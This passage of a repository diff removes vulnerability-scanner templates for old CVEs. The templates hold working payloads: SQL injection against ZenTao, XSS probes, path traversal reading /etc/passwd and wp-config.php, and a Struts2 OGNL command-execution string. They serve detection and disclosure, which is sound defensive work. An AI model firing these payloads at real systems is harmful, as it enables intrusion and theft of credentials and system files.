cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-89
metadata:
verified: true
shodan-query: http.title:"zentao"
fofa-query: "Zentao"
tags: cnvd,cnvd2022,zentao,sqli
variables:
num: "999999999"
requests:
- raw:
- |
POST /zentao/user-login.html HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/zentao/user-login.html
account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1
matchers:
- type: word
part: body
words:
- 'c8c605999f3d8352d7bb792cf3fdb25'
# Enhanced by mp on 2022/09/28

3500
cves.json

File diff suppressed because it is too large Load Diff

View File

@ -1,35 +0,0 @@
id: CVE-2000-0114
info:
name: Microsoft FrontPage Extensions Check (shtml.dll)
author: r3naissance
severity: low
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
- https://www.exploit-db.com/exploits/19897
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cve-id: CVE-2000-0114
cwe-id: NVD-CWE-Other
cvss-score: 5.0
remediation: Upgrade to the latest version.
tags: cve,cve2000,frontpage,microsoft,edb
requests:
- method: GET
path:
- '{{BaseURL}}/_vti_inf.html'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "_vti_bin/shtml.dll"
# Enhanced by mp on 2022/01/27

View File

@ -1,29 +0,0 @@
id: CVE-2001-1473
info:
name: Deprecated SSHv1 Protocol Detection
author: iamthefrogy
severity: high
description: SSHv1 is deprecated and has known cryptographic issues.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 7.4
cve-id: CVE-2001-1473
cwe-id: CWE-310
remediation: Upgrade to SSH 2.4 or later.
tags: cve,cve2001,network,ssh,openssh
network:
- host:
- "{{Hostname}}"
- "{{Host}}:22"
matchers:
- type: word
words:
- "SSH-1"
# Enhanced by Chris on 2022/01/21

View File

@ -1,49 +0,0 @@
id: CVE-2002-1131
info:
name: SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
reference:
- http://www.redhat.com/support/errata/RHSA-2002-204.html
- http://www.debian.org/security/2002/dsa-191
- http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774
- https://www.exploit-db.com/exploits/21811
- https://web.archive.org/web/20051124131714/http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html
- http://web.archive.org/web/20210129020617/https://www.securityfocus.com/bid/5763/
- https://nvd.nist.gov/vuln/detail/CVE-2002-1131
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cve-id: CVE-2002-1131
cwe-id: NVD-CWE-Other
cvss-score: 7.5
tags: cve2002,edb,xss,squirrelmail,cve
requests:
- method: GET
path:
- '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
- '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
# Enhanced by mp on 2022/08/12

View File

@ -1,41 +0,0 @@
id: CVE-2004-0519
info:
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
reference:
- https://www.exploit-db.com/exploits/24068
- http://security.gentoo.org/glsa/glsa-200405-16.xml
- http://web.archive.org/web/20210209233941/https://www.securityfocus.com/archive/1/361857
remediation: Upgrade to the latest version.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2004-0519
cwe-id: NVD-CWE-Other
tags: squirrelmail,cve2004,cve,edb,xss
requests:
- method: GET
path:
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
# Enhanced by mp on 2022/01/27

View File

@ -1,35 +0,0 @@
id: CVE-2005-2428
info:
name: Lotus Domino R5 and R6 WebMail - Information Disclosure
author: CasperGN
severity: medium
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495
- https://nvd.nist.gov/vuln/detail/CVE-2005-2428
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2005-2428
cwe-id: CWE-200
tags: domino,edb,cve,cve2005
requests:
- method: GET
path:
- "{{BaseURL}}/names.nsf/People?OpenView"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
name: domino-username
regex:
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
part: body
# Enhanced by mp on 2022/05/04

View File

@ -1,40 +0,0 @@
id: CVE-2005-3344
info:
name: Horde Groupware Unauthenticated Admin Access
author: pikpikcu
severity: critical
description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2005-3344
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3344
- http://www.debian.org/security/2005/dsa-884
- http://web.archive.org/web/20210206055804/https://www.securityfocus.com/bid/15337
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
cvss-score: 10
cve-id: CVE-2005-3344
cwe-id: NVD-CWE-Other
tags: cve,cve2005,horde,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/horde/admin/user.php"
- "{{BaseURL}}/admin/user.php"
headers:
Content-Type: text/html
matchers-condition: and
matchers:
- type: word
words:
- "<title>Horde :: User Administration</title>"
- type: status
status:
- 200
# Enhanced by mp on 2022/03/18

View File

@ -1,34 +0,0 @@
id: CVE-2005-4385
info:
name: Cofax <=2.0RC3 - Cross-Site Scripting
author: geeknik
severity: medium
description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
reference:
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
- http://web.archive.org/web/20210121165100/https://www.securityfocus.com/bid/15940/
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2005-4385
cwe-id: NVD-CWE-Other
tags: cofax,xss,cve,cve2005
requests:
- method: GET
path:
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "'>\"</script><script>alert(document.domain)</script>"
# Enhanced by mp on 2022/08/12

View File

@ -1,39 +0,0 @@
id: CVE-2006-1681
info:
name: Cherokee HTTPD <=0.5 - Cross-Site Scripting
author: geeknik
severity: medium
description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
reference:
- http://web.archive.org/web/20210217161726/https://www.securityfocus.com/bid/17408/
- http://web.archive.org/web/20140803090438/http://secunia.com/advisories/19587/
- http://www.vupen.com/english/advisories/2006/1292
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2006-1681
cwe-id: NVD-CWE-Other
tags: cherokee,httpd,xss,cve,cve2006
requests:
- method: GET
path:
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
# Enhanced by mp on 2022/08/12

View File

@ -1,37 +0,0 @@
id: CVE-2006-2842
info:
name: Squirrelmail <=1.4.6 - Local File Inclusion
author: dhiyaneshDk
severity: high
description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.
reference:
- https://www.exploit-db.com/exploits/27948
- http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE
- http://www.squirrelmail.org/security/issue/2006-06-01
- http://web.archive.org/web/20160915101900/http://secunia.com/advisories/20406/
- https://nvd.nist.gov/vuln/detail/CVE-2006-2842
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2006-2842
cwe-id: CWE-22
tags: cve,cve2006,lfi,squirrelmail,edb
requests:
- method: GET
path:
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

View File

@ -1,40 +0,0 @@
id: CVE-2007-0885
info:
name: Jira Rainbow.Zen - Cross-Site Scripting
author: geeknik
severity: medium
description: Jira Rainbow.Zen contains a cross-site scripting vulnerability via Jira/secure/BrowseProject.jspa which allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference:
- http://web.archive.org/web/20201208220614/https://www.securityfocus.com/archive/1/459590/100/0/threaded
- https://web.archive.org/web/20210119080228/http://www.securityfocus.com/bid/22503
- https://exchange.xforce.ibmcloud.com/vulnerabilities/32418
- https://nvd.nist.gov/vuln/detail/CVE-2007-0885
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cve-id: CVE-2007-0885
cwe-id: NVD-CWE-Other
cvss-score: 6.8
tags: cve,cve2007,jira,xss
requests:
- method: GET
path:
- '{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e'
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain)</script>'
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
# Enhanced by mp on 2022/08/12

View File

@ -1,35 +0,0 @@
id: CVE-2007-4504
info:
name: Joomla! RSfiles <=1.0.2 - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
reference:
- https://www.exploit-db.com/exploits/4307
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36222
- https://nvd.nist.gov/vuln/detail/CVE-2007-4504
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2007-4504
cwe-id: CWE-22
tags: lfi,edb,cve,cve2007,joomla
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

View File

@ -1,42 +0,0 @@
id: CVE-2007-4556
info:
name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution
author: pikpikcu
severity: critical
description: |
Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character.
reference:
- https://www.guildhab.top/?p=2326
- https://nvd.nist.gov/vuln/detail/CVE-2007-4556
- https://cwiki.apache.org/confluence/display/WW/S2-001
- http://forums.opensymphony.com/ann.jspa?annID=54
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2007-4556
cwe-id: NVD-CWE-Other
tags: cve,cve2007,apache,rce,struts
requests:
- method: POST
path:
- "{{BaseURL}}/login.action"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/05/10

View File

@ -1,44 +0,0 @@
id: CVE-2007-5728
info:
name: phpPgAdmin <=4.1.1 - Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.
reference:
- https://www.exploit-db.com/exploits/30090
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html
- http://web.archive.org/web/20210130131735/https://www.securityfocus.com/bid/24182/
- http://web.archive.org/web/20161220160642/http://secunia.com/advisories/25446/
- https://nvd.nist.gov/vuln/detail/CVE-2007-5728
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2007-5728
cwe-id: CWE-79
metadata:
shodan-query: http.title:"phpPgAdmin"
tags: cve,cve2007,xss,pgadmin,phppgadmin,edb
requests:
- method: GET
path:
- '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test'
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert("document.domain")</script>'
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
# Enhanced by mp on 2022/08/12

View File

@ -1,39 +0,0 @@
id: CVE-2008-1059
info:
name: WordPress Sniplets 1.1.2 - Local File Inclusion
author: dhiyaneshDK
severity: high
description: |
PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
reference:
- https://www.exploit-db.com/exploits/5194
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
- https://nvd.nist.gov/vuln/detail/CVE-2008-1059
- https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2008-1059
cwe-id: CWE-79
tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/07/29

View File

@ -1,43 +0,0 @@
id: CVE-2008-1061
info:
name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting
author: dhiyaneshDK
severity: high
description: |
WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
reference:
- https://www.exploit-db.com/exploits/5194
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
- https://nvd.nist.gov/vuln/detail/CVE-2008-1061
- http://securityreason.com/securityalert/3706
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2008-1061
cwe-id: CWE-79
tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31

View File

@ -1,41 +0,0 @@
id: CVE-2008-2398
info:
name: AppServ Open Project <=2.5.10 - Cross-Site Scripting
author: unstabl3
severity: medium
description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
reference:
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
- http://web.archive.org/web/20210121181851/https://www.securityfocus.com/bid/29291/
- http://web.archive.org/web/20140724110348/http://secunia.com/advisories/30333/
- http://securityreason.com/securityalert/3896
- https://nvd.nist.gov/vuln/detail/CVE-2008-2398
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cve-id: CVE-2008-2398
cwe-id: CWE-79
cvss-score: 4.3
tags: cve,cve2008,xss
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<svg/onload=confirm('xss')>"
part: body
- type: word
words:
- "text/html"
part: header
# Enhanced by mp on 2022/08/12

View File

@ -1,40 +0,0 @@
id: CVE-2008-2650
info:
name: CMSimple 3.1 - Local File Inclusion
author: pussycat0x
severity: high
description: |
CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
reference:
- http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17
- http://web.archive.org/web/20210121182016/https://www.securityfocus.com/bid/29450/
- http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463
- https://nvd.nist.gov/vuln/detail/CVE-2008-2650
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2008-2650
cwe-id: CWE-22
tags: cve,cve2008,lfi,cmsimple
requests:
- raw:
- |
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

View File

@ -1,36 +0,0 @@
id: CVE-2008-4668
info:
name: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6618
- http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/
- http://securityreason.com/securityalert/4464
- https://nvd.nist.gov/vuln/detail/CVE-2008-4668
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:P/A:P
cvss-score: 9
cve-id: CVE-2008-4668
cwe-id: CWE-22
tags: cve,cve2008,joomla,lfi,edb
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

View File

@ -1,36 +0,0 @@
id: CVE-2008-4764
info:
name: Joomla! <=2.0.0 RC2 - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
reference:
- https://www.exploit-db.com/exploits/5435
- http://web.archive.org/web/20210121181347/https://www.securityfocus.com/bid/28764/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/41873
- https://nvd.nist.gov/vuln/detail/CVE-2008-4764
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2008-4764
cwe-id: CWE-22
tags: edb,cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

View File

@ -1,39 +0,0 @@
id: CVE-2008-5587
info:
name: phpPgAdmin <=4.2.1 - Local File Inclusion
author: dhiyaneshDK
severity: medium
description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/7363
- http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/
- http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014
- http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263
- https://nvd.nist.gov/vuln/detail/CVE-2008-5587
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2008-5587
cwe-id: CWE-22
metadata:
shodan-query: http.title:"phpPgAdmin"
tags: cve,cve2008,lfi,phppgadmin,edb
requests:
- method: GET
path:
- '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/22

View File

@ -1,36 +0,0 @@
id: CVE-2008-6080
info:
name: Joomla! ionFiles 4.4.2 - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/6809
- http://web.archive.org/web/20140804231654/http://secunia.com/advisories/32377/
- http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/
- https://nvd.nist.gov/vuln/detail/CVE-2008-6080
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2008-6080
cwe-id: CWE-22
tags: edb,cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

View File

@ -1,36 +0,0 @@
id: CVE-2008-6172
info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
reference:
- https://www.exploit-db.com/exploits/6817
- https://nvd.nist.gov/vuln/detail/CVE-2008-6172
- http://web.archive.org/web/20140804232841/http://secunia.com/advisories/32367/
- http://web.archive.org/web/20210121184108/https://www.securityfocus.com/bid/31892/
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2008-6172
cwe-id: CWE-22
tags: cve2008,joomla,lfi,edb,cve
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/03/30

View File

@ -1,36 +0,0 @@
id: CVE-2008-6222
info:
name: Joomla! ProDesk 1.0/1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6980
- http://web.archive.org/web/20111223225601/http://secunia.com/advisories/32523/
- http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/
- https://nvd.nist.gov/vuln/detail/CVE-2008-6222
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2008-6222
cwe-id: CWE-22
tags: cve2008,joomla,lfi,edb,cve
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

View File

@ -1,47 +0,0 @@
id: CVE-2008-6465
info:
name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
reference:
- http://www.xssing.com/index.php?x=3&y=65
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2008-6465
cwe-id: CWE-80
metadata:
verified: true
shodan-query: title:"Parallels H-Sphere
tags: cve,cve2008,xss,parallels,h-sphere
requests:
- method: GET
path:
- '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '\" onfocus=alert(document.domain); autofocus'
- 'Please enter login name &amp; password'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
# Enhanced by md on 2022/12/08

View File

@ -1,38 +0,0 @@
id: CVE-2008-6668
info:
name: nweb2fax <=0.2.7 - Local File Inclusion
author: geeknik
severity: high
description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.
reference:
- https://www.exploit-db.com/exploits/5856
- http://web.archive.org/web/20210130035550/https://www.securityfocus.com/bid/29804
- https://exchange.xforce.ibmcloud.com/vulnerabilities/43173
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2008-6668
cwe-id: CWE-22
